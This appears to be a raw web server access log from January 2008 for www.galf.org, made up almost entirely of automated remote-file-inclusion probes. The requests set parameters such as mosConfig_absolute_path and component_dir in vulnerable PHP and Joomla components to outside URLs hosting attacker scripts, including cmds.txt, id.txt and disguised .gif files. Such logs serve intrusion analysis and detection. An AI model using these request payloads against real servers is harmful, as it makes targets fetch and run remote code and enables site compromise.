67.15.12.20 - - [13/Jan/2008:12:24:51 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:24:51 -0800] "GET /logs/vwar/admin/?vwar_root=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:12:25:08 -0800] "GET /forums/chat//inc/cmses/aedating4CMS.php?dir[inc]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.90.179.94 - - [13/Jan/2008:12:25:52 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [13/Jan/2008:12:26:09 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [13/Jan/2008:12:26:10 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [13/Jan/2008:12:26:10 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
208.80.193.39 - - [13/Jan/2008:12:26:16 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc5; i686 Linux; 20020223)" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:12:26:21 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:12:26:22 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.188 - - [13/Jan/2008:12:26:25 -0800] "GET /logs/admin/editor2/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.188 - - [13/Jan/2008:12:26:26 -0800] "GET /admin/editor2/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.19.144.26 - - [13/Jan/2008:12:26:26 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
210.166.214.136 - - [13/Jan/2008:12:26:55 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.166.214.136 - - [13/Jan/2008:12:26:56 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.166.214.136 - - [13/Jan/2008:12:26:56 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.166.214.136 - - [13/Jan/2008:12:27:06 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.74.175.5 - - [13/Jan/2008:12:27:50 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.74.175.5 - - [13/Jan/2008:12:27:51 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.74.175.5 - - [13/Jan/2008:12:27:51 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.74.175.5 - - [13/Jan/2008:12:28:00 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:12:28:28 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:29:35 -0800] "GET /logs/access_070827.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:29:35 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:29:35 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:29:43 -0800] "GET /logs/access_070709.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:12:29:46 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:29:58 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.30.221.50 - - [13/Jan/2008:12:30:09 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [13/Jan/2008:12:30:10 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:30:10 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.157.182.9 - - [13/Jan/2008:12:30:22 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [13/Jan/2008:12:30:23 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [13/Jan/2008:12:30:25 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [13/Jan/2008:12:30:48 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.30.221.50 - - [13/Jan/2008:12:30:53 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:30:58 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:30:59 -0800] "GET /logs//?mosConfig_absolute_path=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 200 5478 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:12:30:59 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.68.176 - - [13/Jan/2008:12:31:36 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.68.176 - - [13/Jan/2008:12:31:36 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.68.176 - - [13/Jan/2008:12:31:36 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:31:48 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:31:48 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:31:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:31:51 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:31:54 -0800] "GET //admin.webring.docs.php?component_dir=http://www.freewebtown.com/vibeblog/ty.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:32:25 -0800] "GET /logs/access_070827.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:32:25 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:32:25 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:32:55 -0800] "GET /logs/access_070709.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:12:33:06 -0800] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.94.142.14 - - [13/Jan/2008:12:33:46 -0800] "GET /logs//index1.php?p=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
64.94.142.14 - - [13/Jan/2008:12:33:47 -0800] "GET //index1.php?p=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
82.192.68.176 - - [13/Jan/2008:12:34:21 -0800] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.164 - - [13/Jan/2008:12:34:26 -0800] "GET /logs/access_070625.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.164 - - [13/Jan/2008:12:34:26 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.164 - - [13/Jan/2008:12:34:26 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:34:36 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.freewebtown.com/vibeblog/ty.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:34:36 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.freewebtown.com/vibeblog/ty.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:34:41 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.freewebtown.com/vibeblog/ty.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:34:56 -0800] "GET /logs/access_070827.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:34:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:34:57 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:35:12 -0800] "GET /logs/access_070709.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:35:28 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.26.203 - - [13/Jan/2008:12:35:41 -0800] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:36:02 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:36:02 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:12:36:08 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.157.91 - - [13/Jan/2008:12:36:22 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
66.98.246.23 - - [13/Jan/2008:12:36:38 -0800] "GET /logs/access_070625.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:37:40 -0800] "GET /logs/access_070827.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:37:40 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:37:40 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:38:03 -0800] "GET /logs/access_070709.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.54.19 - - [13/Jan/2008:12:38:09 -0800] "GET /logs/template.php?pagina=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.19 - - [13/Jan/2008:12:38:09 -0800] "GET /template.php?pagina=http://www.arkitektsolli.no//script/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:38:18 -0800] "GET /index.php?pag=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:38:18 -0800] "GET /logs/index.php?pag=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:39:28 -0800] "GET /logs/access_070910.log/modify.php?dir_module=http://www.freewebtown.com/ooboticario/script.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:39:41 -0800] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
217.20.89.210 - - [13/Jan/2008:12:39:46 -0800] "GET /logs/access.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [13/Jan/2008:12:39:47 -0800] "GET //admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [13/Jan/2008:12:39:48 -0800] "GET /logs//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.20.89.210 - - [13/Jan/2008:12:40:08 -0800] "GET /logs/access_071210.log//admin.webring.docs.php?component_dir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.12.50.119 - - [13/Jan/2008:12:41:28 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.12.50.119 - - [13/Jan/2008:12:41:28 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
69.89.31.52 - - [13/Jan/2008:12:41:28 -0800] "GET /logs/access_071029.log/modify.php?dir_module=http://www.freewebtown.com/ooboticario/script.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.147.60 - - [13/Jan/2008:12:41:48 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
208.53.147.60 - - [13/Jan/2008:12:41:48 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:42:09 -0800] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
64.128.80.15 - - [13/Jan/2008:12:42:15 -0800] "GET /logs/template.php?pagina=http://www.gulvtech.no/gulvtech/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.128.80.15 - - [13/Jan/2008:12:42:15 -0800] "GET /template.php?pagina=http://www.gulvtech.no/gulvtech/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:42:16 -0800] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:42:17 -0800] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:42:26 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:42:31 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:42:31 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:42:31 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:42:34 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:42:34 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:42:34 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:42:35 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:42:35 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:42:35 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:42:38 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:42:38 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:42:39 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:42:39 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:42:39 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:42:39 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:42:55 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.35.198 - - [13/Jan/2008:12:42:55 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
